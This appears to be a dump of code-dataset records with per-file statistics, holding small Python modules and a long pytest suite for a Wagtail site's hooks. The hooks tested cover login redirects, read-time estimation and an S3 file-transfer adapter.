"""
Created on Fri Dec 27 12:19:49 2019
@author: thisisbex
"""
| 13.428571
| 36
| 0.553191
| 14
| 94
| 3.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183099
| 0.244681
| 94
| 6
| 37
| 15.666667
| 0.549296
| 0.829787
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
feb89729f9b331ba7cd278372a7a3f30c55a2f37
| 63
|
py
|
Python
|
aiochsa/sql.py
|
ods/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 17
|
2019-08-20T08:40:57.000Z
|
2022-01-02T04:00:28.000Z
|
aiochsa/sql.py
|
chinchy/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 10
|
2020-08-04T16:02:21.000Z
|
2022-01-02T11:40:00.000Z
|
aiochsa/sql.py
|
chinchy/aiochsa
|
471f72b70e5e6b62968ef401e402c23d8c0f28b5
|
[
"MIT"
] | 2
|
2021-04-18T15:37:07.000Z
|
2021-12-13T11:42:00.000Z
|
from clickhouse_sqlalchemy.sql import Select
select = Select
| 12.6
| 44
| 0.825397
| 8
| 63
| 6.375
| 0.75
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 63
| 4
| 45
| 15.75
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
228eec461b505a590bfec4b7b50c5ce810c3614b
| 215
|
py
|
Python
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 12
|
2019-08-02T07:58:16.000Z
|
2022-01-31T23:45:08.000Z
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 12
|
2019-12-04T23:48:45.000Z
|
2022-03-11T23:53:30.000Z
|
venv/lib/python3.7/site-packages/allauth/socialaccount/providers/steam/urls.py
|
vikram0207/django-rest
|
eafec575999dce6859dc7b99177cff339b2bcbdd
|
[
"MIT"
] | 11
|
2019-07-31T16:23:36.000Z
|
2022-01-29T08:30:07.000Z
|
from django.conf.urls import url
from . import views
urlpatterns = [
url("^steam/login/$", views.steam_login, name="steam_login"),
url("^steam/callback/$", views.steam_callback, name="steam_callback"),
]
| 21.5
| 74
| 0.697674
| 28
| 215
| 5.214286
| 0.428571
| 0.205479
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134884
| 215
| 9
| 75
| 23.888889
| 0.784946
| 0
| 0
| 0
| 0
| 0
| 0.260465
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
a3c08be61fb750ca0dbb0723d8732578bab4842b
| 36,297
|
py
|
Python
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 10
|
2020-04-30T12:04:35.000Z
|
2021-07-21T12:48:55.000Z
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 1,461
|
2020-01-23T18:20:26.000Z
|
2022-03-31T08:05:56.000Z
|
tests/unit/core/test_wagtail_hooks.py
|
uktrade/great-cms
|
f13fa335ddcb925bc33a5fa096fe73ef7bdd351a
|
[
"MIT"
] | 3
|
2020-04-07T20:11:36.000Z
|
2020-10-16T16:22:59.000Z
|
import json
from datetime import timedelta
from unittest import mock
import pytest
from boto3.exceptions import RetriesExceededError, S3UploadFailedError
from django.contrib.auth.models import AnonymousUser
from django.contrib.sessions.middleware import SessionMiddleware
from django.db.models import FileField
from django.test import override_settings
from wagtail.core.rich_text import RichText
from core import cms_slugs, wagtail_hooks
from core.models import DetailPage
from core.wagtail_hooks import (
FileTransferError,
S3FileFieldAdapter,
S3WagtailTransferFile,
editor_css,
register_s3_media_file_adapter,
)
from tests.helpers import make_test_video
from tests.unit.core import factories
from tests.unit.learn.factories import LessonPageFactory
LOREM_IPSUM = (
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. '
'Verum hoc loco sumo verbis his eandem certe vim voluptatis '
'Epicurum nosse quam ceteros. Consequentia exquirere, quoad sit '
'id, quod volumus, effectum. Et quidem saepe quaerimus verbum '
'Latinum par Graeco et quod idem valeat; Quam illa ardentis '
'amores excitaret sui! Cur tandem? Nihil est enim, de quo aliter '
'tu sentias atque ego, modo commutatis verbis ipsas res conferamus. '
)
@pytest.mark.django_db
def test_anonymous_user_required_handles_anonymous_users(rf, domestic_homepage):
    """The hook returns None (page served normally) for anonymous visitors."""
    request = rf.get('/')
    request.user = AnonymousUser()
    response = wagtail_hooks.anonymous_user_required(
        page=domestic_homepage,
        request=request,
        serve_args=[],
        serve_kwargs={},
    )
    # None means the hook declined to intervene
    assert response is None
@pytest.mark.django_db
def test_anonymous_user_required_handles_authenticated_users(rf, domestic_homepage, user):
    """Authenticated users are redirected away from anonymous-only pages."""
    request = rf.get('/')
    request.user = user
    # The hook needs a session on the request, so run the session middleware
    middleware = SessionMiddleware()
    middleware.process_request(request)
    request.session.save()
    response = wagtail_hooks.anonymous_user_required(
        page=domestic_homepage,
        request=request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response.status_code == 302
    assert response.url == domestic_homepage.anonymous_user_required_redirect_url
@pytest.mark.django_db
def test_login_required_signup_wizard_ignores_irrelevant_pages(rf, domestic_homepage):
    """Pages that don't require login (the homepage here) are left alone."""
    request = rf.get('/')
    request.user = AnonymousUser()
    response = wagtail_hooks.login_required_signup_wizard(
        page=domestic_homepage,
        request=request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response is None
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_anonymous_users(rf, domestic_homepage):
    """Anonymous users hitting a lesson page are sent to the signup wizard,
    with the original path preserved in the ``next`` query param."""
    page = LessonPageFactory(parent=domestic_homepage)
    request = rf.get('/foo/bar/')
    request.user = AnonymousUser()
    # The hook reads/writes the session, so attach one
    middleware = SessionMiddleware()
    middleware.process_request(request)
    request.session.save()
    response = wagtail_hooks.login_required_signup_wizard(
        page=page,
        request=request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response.status_code == 302
    assert response.url == '/signup/tailored-content/start/?next=/foo/bar/'
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_anonymous_users_opting_out(rf, domestic_homepage, user):
    """An anonymous user who opts for generic content (?show-generic-content=True)
    is not redirected, and the opt-out persists in the session for later requests."""
    page = LessonPageFactory(parent=domestic_homepage)
    first_request = rf.get('/foo/bar/', {'show-generic-content': True})
    first_request.user = AnonymousUser()
    middleware = SessionMiddleware()
    middleware.process_request(first_request)
    first_request.session.save()
    response = wagtail_hooks.login_required_signup_wizard(
        page=page,
        request=first_request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response is None
    # Second request reuses the same session; still no redirect
    second_request = rf.get('/foo/bar/')
    second_request.user = user
    second_request.session = first_request.session
    response = wagtail_hooks.login_required_signup_wizard(
        page=page,
        request=second_request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response is None
@pytest.mark.django_db
def test_login_required_signup_wizard_handles_authenticated_users(rf, user, domestic_homepage):
    """Authenticated users are never redirected to the signup wizard."""
    page = LessonPageFactory(parent=domestic_homepage)
    request = rf.get('/')
    request.user = user
    response = wagtail_hooks.login_required_signup_wizard(
        page=page,
        request=request,
        serve_args=[],
        serve_kwargs={},
    )
    assert response is None
@pytest.mark.django_db
def test_estimated_read_time_calculation(rf, domestic_homepage):
    """_set_read_time computes and stores the read duration for text-only content."""
    # IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
    # your changeset has slightly increased the size of the HTML page, which
    # may have slightly pushed up the default/empty-page readtime (either in
    # real terms or just in terms of elements that affect the calculation). If
    # so, pushing up the expected time variables in the test is OK to do.
    request = rf.get('/')
    request.user = AnonymousUser()
    reading_content = f'<p>{ LOREM_IPSUM * 10}</p>'
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        hero=[],
        body=[],
        objective=[('paragraph', RichText(reading_content))],
    )
    # Every real-world page will have a revision, so the test needs one, too
    revision = detail_page.save_revision()
    revision.publish()
    expected_duration = timedelta(seconds=152)
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration != expected_duration
    wagtail_hooks._set_read_time(page=detail_page, request=request)
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__checks_text_and_video(rf, domestic_homepage):
    """Read time for a page with both text and a hero video is reading + watching time."""
    # IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
    # your changeset has slightly increased the size of the HTML page, which
    # may have slightly pushed up the default/empty-page readtime (either in
    # real terms or just in terms of elements that affect the calculation). If
    # so, pushing up the expected time variables in the test is OK to do.
    request = rf.get('/')
    request.user = AnonymousUser()
    video_for_hero = make_test_video(duration=123)
    video_for_hero.save()
    reading_content = f'<p>{ LOREM_IPSUM * 10}</p>'
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        hero=[
            ('Video', factories.SimpleVideoBlockFactory(video=video_for_hero)),
        ],
        objective=[('paragraph', RichText(reading_content))],
        body=[],  # if needed StreamField rich-text and video content can be added
    )
    # Every real-world page will have a revision, so the test needs one, too
    revision = detail_page.save_revision()
    revision.publish()
    expected_duration = timedelta(seconds=153 + 123)  # reading + watching
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration != expected_duration
    wagtail_hooks._set_read_time(page=detail_page, request=request)
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__checks_video(rf, domestic_homepage):
    """Read time for a video-only page is the skeleton read time plus video duration."""
    # IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
    # your changeset has slightly increased the size of the HTML page, which
    # may have slightly pushed up the default/empty-page readtime (either in
    # real terms or just in terms of elements that affect the calculation). If
    # so, pushing up the expected time variables in the test is OK to do.
    request = rf.get('/')
    request.user = AnonymousUser()
    video_for_hero = make_test_video(duration=123)
    video_for_hero.save()
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        hero=[
            ('Video', factories.SimpleVideoBlockFactory(video=video_for_hero)),
        ],
        objective=[],
        body=[],  # if needed StreamField rich-text and video content can be added
    )
    # Every real-world page will have a revision, so the test needs one, too
    revision = detail_page.save_revision()
    revision.publish()
    expected_duration = timedelta(seconds=4 + 123)  # reading + watching
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration != expected_duration
    wagtail_hooks._set_read_time(page=detail_page, request=request)
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration == expected_duration
@pytest.mark.django_db
def test_estimated_read_time_calculation__updates_only_draft_if_appropriate(rf, domestic_homepage):
    """When a page has unpublished changes, _set_read_time updates only the draft
    revision; the live page is only updated after that revision is published."""
    # IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
    # your changeset has slightly increased the size of the HTML page, which
    # may have slightly pushed up the default/empty-page readtime (either in
    # real terms or just in terms of elements that affect the calculation). If
    # so, pushing up the expected time variables in the test is OK to do.
    request = rf.get('/')
    request.user = AnonymousUser()
    video_for_hero = make_test_video(duration=124)
    video_for_hero.save()
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    assert detail_page.live is True
    original_live_read_duration = detail_page.estimated_read_duration
    assert original_live_read_duration is None
    # Note: for test simplicity here, we're not adding streamfield content to our
    # revision - it is enough to just notice how the readtimes for Draft vs Live
    # are appropriate updated at the expected times, based on the minimal default
    # content of a DetailPage.
    revision = detail_page.save_revision()
    assert json.loads(revision.content_json)['estimated_read_duration'] == original_live_read_duration
    detail_page.refresh_from_db()
    wagtail_hooks._set_read_time(page=detail_page, request=request)
    detail_page.refresh_from_db()
    expected_duration = timedelta(seconds=2)  # NB just the read time of a skeleton DetailPage
    # show the live version is not updated yet
    assert detail_page.has_unpublished_changes is True
    assert detail_page.estimated_read_duration != expected_duration
    assert detail_page.estimated_read_duration == original_live_read_duration
    # but the draft is
    latest_rev = detail_page.get_latest_revision()
    assert revision == latest_rev
    assert json.loads(latest_rev.content_json)['estimated_read_duration'] == str(expected_duration)
    # Now publish the draft and show it updates the live, too
    latest_rev.publish()
    detail_page.refresh_from_db()
    wagtail_hooks._set_read_time(page=detail_page, request=request)
    detail_page.refresh_from_db()
    assert detail_page.estimated_read_duration != original_live_read_duration
    # NOTE: for a reason unrelated to the point of _this_ test, the readtime
    # of the published page CAN BE calculated as slightly longer than the draft.
    # This may be in part due to the page having a very small amount of content.
    assert detail_page.estimated_read_duration == timedelta(seconds=3)
@pytest.mark.django_db
def test_estimated_read_time_calculation__forced_update_of_live(rf, domestic_homepage):
    """With is_post_creation=True, _set_read_time updates the live page AND the draft."""
    # This test is a variant of test_estimated_read_time_calculation__updates_only_draft_if_appropriate
    # IF THIS TEST FAILS BASED ON OFF-BY-ONE-SECOND DURATIONS... check whether
    # your changeset has slightly increased the size of the HTML page, which
    # may have slightly pushed up the default/empty-page readtime (either in
    # real terms or just in terms of elements that affect the calculation). If
    # so, pushing up the expected time variables in the test is OK to do.
    request = rf.get('/')
    request.user = AnonymousUser()
    video_for_hero = make_test_video(duration=124)
    video_for_hero.save()
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    assert detail_page.live is True
    original_live_read_duration = detail_page.estimated_read_duration
    assert original_live_read_duration is None
    # Make a revision, so we have both draft and live in existence
    revision = detail_page.save_revision()
    assert json.loads(revision.content_json)['estimated_read_duration'] == original_live_read_duration
    detail_page.refresh_from_db()
    wagtail_hooks._set_read_time(
        page=detail_page,
        request=request,
        is_post_creation=True,  # THIS will mean the live page is updated at the same time as the draft
    )
    detail_page.refresh_from_db()
    expected_duration = timedelta(seconds=2)  # NB just the read time of a skeleton DetailPage
    # show the live version is updated immediately
    assert detail_page.estimated_read_duration == expected_duration
    assert detail_page.has_unpublished_changes is True
    # and the draft is updated too
    latest_rev = detail_page.get_latest_revision()
    assert revision == latest_rev
    assert json.loads(latest_rev.content_json)['estimated_read_duration'] == str(expected_duration)
@pytest.mark.parametrize('is_post_creation_val', (True, False))
@pytest.mark.django_db
def test__set_read_time__passes_through_is_post_creation(
    rf,
    domestic_homepage,
    is_post_creation_val,
):
    """_set_read_time forwards is_post_creation as force_page_update to the updater."""
    request = rf.get('/')
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    with mock.patch(
        'core.wagtail_hooks._update_data_for_appropriate_version'
    ) as mocked_update_data_for_appropriate_version:
        wagtail_hooks._set_read_time(request, detail_page, is_post_creation=is_post_creation_val)
    expected_seconds = 2
    mocked_update_data_for_appropriate_version.assert_called_once_with(
        page=detail_page,
        force_page_update=is_post_creation_val,
        data_to_update={'estimated_read_duration': timedelta(seconds=expected_seconds)},
    )
@pytest.mark.django_db
@pytest.mark.parametrize('force_update', (False, True))
def test__update_data_for_appropriate_version(domestic_homepage, rf, force_update):
    """The latest revision is always updated; the live page only when forced."""
    request = rf.get('/')
    request.user = AnonymousUser()
    detail_page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    assert detail_page.live is True
    # Make a revision, so we have both draft and live in existence
    revision = detail_page.save_revision()
    assert detail_page.get_latest_revision() == revision
    assert detail_page.title != 'Dummy Title'
    assert json.loads(revision.content_json)['title'] == detail_page.title
    wagtail_hooks._update_data_for_appropriate_version(
        page=detail_page, force_page_update=force_update, data_to_update={'title': 'Dummy Title'}
    )
    revision.refresh_from_db()
    assert json.loads(revision.content_json)['title'] == 'Dummy Title'
    detail_page.refresh_from_db()
    if force_update:
        assert detail_page.title == 'Dummy Title'
    else:
        assert detail_page.title != 'Dummy Title'
@pytest.mark.django_db
def test_set_read_time__after_create_page(domestic_homepage, rf):
    """The after-create hook delegates to _set_read_time with is_post_creation=True."""
    fake_request = rf.get('/')
    page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    with mock.patch('core.wagtail_hooks._set_read_time') as patched_set_read_time:
        wagtail_hooks.set_read_time__after_create_page(fake_request, page)
    patched_set_read_time.assert_called_once_with(fake_request, page, is_post_creation=True)
@pytest.mark.django_db
def test_set_read_time__after_edit_page(domestic_homepage, rf):
    """The after-edit hook delegates to _set_read_time without the creation flag."""
    fake_request = rf.get('/')
    page = factories.DetailPageFactory(
        parent=domestic_homepage,
        template='learn/detail_page.html',
        body=[],
    )
    with mock.patch('core.wagtail_hooks._set_read_time') as patched_set_read_time:
        wagtail_hooks.set_read_time__after_edit_page(fake_request, page)
    patched_set_read_time.assert_called_once_with(fake_request, page)
def test_wagtail_transfer_custom_adapter_methods___get_relevant_s3_meta():
    """_get_relevant_s3_meta builds {'size', 'hash'} from an S3 ObjectSummary,
    looked up by the field value's bucket name and key."""
    mock_field = mock.Mock(name='mock_field')
    adapter = S3FileFieldAdapter(mock_field)
    mock_field_value = mock.Mock(name='mock_field_value')
    mock_field_value.storage.bucket.name = 'test-bucket-name'
    mock_field_value.name = 'test-bucket-key'
    # There are other attributes on the real object, eg 'url'
    mock_objectsummary_instance = mock.Mock(name='mock_objectsummary_instance')
    mock_objectsummary_instance.size = 1234567
    mock_objectsummary_instance.e_tag.replace.return_value = 'aabbccddeeff112233445566'
    # The double quoting is correct - ETags are meant to be double-quoted.
    # See https://tools.ietf.org/html/rfc2616#section-14.19
    mock_objectsummary_class = mock.Mock(name='mock ObjectSummary')
    mock_objectsummary_class.return_value = mock_objectsummary_instance
    with mock.patch('core.wagtail_hooks.s3.ObjectSummary', mock_objectsummary_class):
        meta = adapter._get_relevant_s3_meta(mock_field_value)
    mock_objectsummary_class.assert_called_once_with('test-bucket-name', 'test-bucket-key')
    assert meta == {'size': 1234567, 'hash': 'aabbccddeeff112233445566'}
@pytest.mark.parametrize(
    'etag_val,expected',
    (
        ('"aabbccddeeff112233445566"', 'aabbccddeeff112233445566'),
        ('aabbccddeeff112233445566', 'aabbccddeeff112233445566'),
        ("aabbccddeeff112233445566", 'aabbccddeeff112233445566'),  # noqa Q000 - this was deliberate
    ),
)
def test_wagtail_transfer_custom_adapter_methods___get_file_hash(etag_val, expected):
    """_get_file_hash strips any surrounding double-quotes from the S3 ETag."""
    mock_field = mock.Mock(name='mock_field')
    adapter = S3FileFieldAdapter(mock_field)
    mock_objectsummary_instance = mock.Mock(name='mock_objectsummary_instance')
    mock_objectsummary_instance.size = 1234567
    mock_objectsummary_instance.e_tag = etag_val
    hash_ = adapter._get_file_hash(mock_objectsummary_instance)
    assert hash_ == expected
@pytest.mark.parametrize(
    'file_url,expected',
    (
        # See constants.AWS_S3_MAIN_HOSTNAME_OPTIONS
        (
            'https://w-t-test-bucket.s3.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
        (
            'http://w-t-test-bucket.s3.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
        (
            'https://w-t-test-bucket.s3.eu-west-2.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
        (
            'https://w-t-test-bucket.s3.dualstack.eu-west-2.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
        (
            'https://w-t-test-bucket.s3-accesspoint.eu-west-2.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
        (
            'https://w-t-test-bucket.s3-accesspoint.dualstack.eu-west-2.amazonaws.com/media/path/to/file.mp4',
            ('w-t-test-bucket', 'media/path/to/file.mp4'),
        ),
    ),
)
def test_wagtail_transfer_custom_adapter_methods___get_imported_file_bucket_and_key(file_url, expected):
    """Bucket name and object key are parsed from every supported S3 hostname form."""
    mock_field = mock.Mock(name='mock_field')
    adapter = S3FileFieldAdapter(mock_field)
    assert adapter._get_imported_file_bucket_and_key(file_url) == expected
@override_settings(MEDIA_URL='https://magna-fake-example.s3.amazonaws.com')
@pytest.mark.parametrize(
    'url,expected',
    (
        (
            'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
            {
                'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
                'size': 123321,
                'hash': 'aabbccddeeff665544332211',
            },
        ),
        (None, None),  # no field value -> serialize returns None
    ),
)
def test_wagtail_transfer_custom_adapter_methods__serialize(url, expected):
    """serialize returns the S3 meta dict for a populated field, None for an empty one."""
    file_field = FileField()
    if url:
        mock_field_value = mock.Mock()
        mock_field_value.url = url
        # There are other attributes on the real object, but we're only using url here
    else:
        mock_field_value = None
    file_field.value_from_object = mock.Mock(return_value=mock_field_value)
    adapter = S3FileFieldAdapter(file_field)
    instance = mock.Mock()
    mock_get_relevant_s3_meta = mock.Mock(
        return_value={'download_url': url, 'size': 123321, 'hash': 'aabbccddeeff665544332211'}
    )
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        output = adapter.serialize(instance)
    assert output == expected
    file_field.value_from_object.assert_called_once_with(instance)
    if url:
        mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
####################################################################################################
# Cases for S3FileFieldAdapter.populate_field
# These following tests are repetitive, but using parametrize() to DRY them up just
# made them really complex
# 1. File not already imported, source's hash matches hashes with existing file, so no import needed
# 2. File not already imported, source's hash doesn't match existing file, so we do a fresh import
# 3. As above, but an exception is raised during file.transfer()
# 4. File was already imported - no need to re-import
# 5. Null `value` param, we abandon early
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_1():
    # 1. File not already imported, source's hash matches hashes with existing file, so no import needed
    file_field = FileField()
    file_field.get_attname = mock.Mock(return_value='some-filefield')
    mock_field_value = mock.Mock(name='mock_field_value')
    mock_field_value.storage.bucket.name = 'test-bucket-name'
    mock_field_value.name = 'test-bucket-key'
    file_field.value_from_object = mock.Mock(return_value=mock_field_value)
    adapter = S3FileFieldAdapter(file_field)
    fake_value = {
        'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        'size': 123321,
        'hash': 'aabbccddeeff665544332211',
    }
    adapter._get_imported_file_bucket_and_key = mock.Mock(
        return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
    )
    mock_context = mock.Mock()
    mock_context.imported_files_by_source_url = {}  # ie, nothing imported yet
    mock_imported_file = mock.Mock(name='mock_imported_file')
    mock_get_relevant_s3_meta = mock.Mock(
        return_value={
            'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
            'size': 123321,
            'hash': 'aabbccddeeff665544332211',  # same as existing file, so no import will happen
        }
    )
    mock_s3_file = mock.Mock(name='mock_s3_file')
    mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
    mock_s3_file.transfer.return_value = mock_imported_file
    mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file)  # noqa N806
    mock_instance = mock.Mock()
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
            adapter.populate_field(
                instance=mock_instance,
                value=fake_value,
                context=mock_context,
            )
    # Hashes matched, so no transfer machinery was invoked
    assert adapter._get_imported_file_bucket_and_key.call_count == 0
    mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
    assert mock_S3WagtailTransferFile.call_count == 0
    assert mock_s3_file.transfer.call_count == 0
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_2():
    # 2. File not already imported, source's hash DOES NOT match existing file, so we do a fresh import
    file_field = FileField()
    file_field.get_attname = mock.Mock(return_value='some-filefield')
    mock_field_value = mock.Mock(name='mock_field_value')
    mock_field_value.storage.bucket.name = 'test-bucket-name'
    mock_field_value.name = 'test-bucket-key'
    file_field.value_from_object = mock.Mock(return_value=mock_field_value)
    mock_instance = mock.Mock()
    adapter = S3FileFieldAdapter(file_field)
    fake_value = {
        'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        'size': 123321,
        'hash': 'aabbccddeeff665544332211',
    }
    adapter._get_imported_file_bucket_and_key = mock.Mock(
        return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
    )
    mock_context = mock.Mock()
    mock_context.imported_files_by_source_url = {}  # ie, nothing imported yet
    mock_imported_file = mock.Mock(name='mock_imported_file')
    mock_get_relevant_s3_meta = mock.Mock(
        return_value={
            'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
            'size': 123321,
            'hash': 'bbccddeeff',  # ie, does NOT match
        }
    )
    mock_s3_file = mock.Mock(name='mock_s3_file')
    mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
    mock_s3_file.transfer.return_value = mock_imported_file
    mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file)  # noqa N806
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
            adapter.populate_field(
                instance=mock_instance,
                value=fake_value,
                context=mock_context,
            )
    # the importer was called
    mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
    adapter._get_imported_file_bucket_and_key.assert_called_once_with(fake_value['download_url'])
    mock_S3WagtailTransferFile.assert_called_once_with(
        local_filename='path/to/file.jpg',  # not changed by DefaultStorage in this test
        size=123321,
        hash_='aabbccddeeff665544332211',
        source_url='https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        source_bucket='magna-fake-example.s3.amazonaws.com',
        source_key='path/to/file.jpg',
    )
    mock_s3_file.transfer.assert_called_once_with()  # Deliberately no args
    # show the imported file is now in the cache so it won't be re-imported
    assert mock_context.imported_files_by_source_url['MOCK_SOURCE_URL_VALUE'] == mock_imported_file
def test_wagtail_transfer_custom_adapter_methods__populate_field__case_3():
    # 3. As above, but an exception is raised during file.transfer()
    file_field = FileField()
    file_field.get_attname = mock.Mock(return_value='some-filefield')
    mock_field_value = mock.Mock(name='mock_field_value')
    mock_field_value.storage.bucket.name = 'test-bucket-name'
    mock_field_value.name = 'test-bucket-key'
    file_field.value_from_object = mock.Mock(return_value=mock_field_value)
    mock_instance = mock.Mock()
    adapter = S3FileFieldAdapter(file_field)
    fake_value = {
        'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
        'size': 123321,
        'hash': 'aabbccddeeff665544332211',
    }
    adapter._get_imported_file_bucket_and_key = mock.Mock(
        return_value=('magna-fake-example.s3.amazonaws.com', 'path/to/file.jpg')
    )
    mock_context = mock.Mock()
    mock_context.imported_files_by_source_url = {}  # ie, nothing imported yet
    mock_get_relevant_s3_meta = mock.Mock(
        return_value={
            'download_url': 'https://magna-fake-example.s3.amazonaws.com/path/to/file.jpg',
            'size': 123321,
            'hash': 'bbccddeeff',  # ie, does NOT match
        }
    )
    mock_s3_file = mock.Mock(name='mock_s3_file')
    mock_s3_file.source_url = 'MOCK_SOURCE_URL_VALUE'
    # simulate the transfer blowing up
    mock_s3_file.transfer.side_effect = FileTransferError('Faked')
    mock_S3WagtailTransferFile = mock.Mock(return_value=mock_s3_file)  # noqa N806
    with mock.patch('core.wagtail_hooks.S3FileFieldAdapter._get_relevant_s3_meta', mock_get_relevant_s3_meta):
        with mock.patch('core.wagtail_hooks.S3WagtailTransferFile', mock_S3WagtailTransferFile):
            adapter.populate_field(
                instance=mock_instance,
                value=fake_value,
                context=mock_context,
            )
    # the importer was called, but didn't succeed
    mock_get_relevant_s3_meta.assert_called_once_with(field_value=mock_field_value)
    adapter._get_imported_file_bucket_and_key.assert_called_once_with(fake_value['download_url'])
    mock_S3WagtailTransferFile.assert_called_once_with(
        local_filename='path/to/file.jpg',  # not changed by DefaultStorage in this test
        size=123321,
        hash_='aabbccddeeff665544332211',
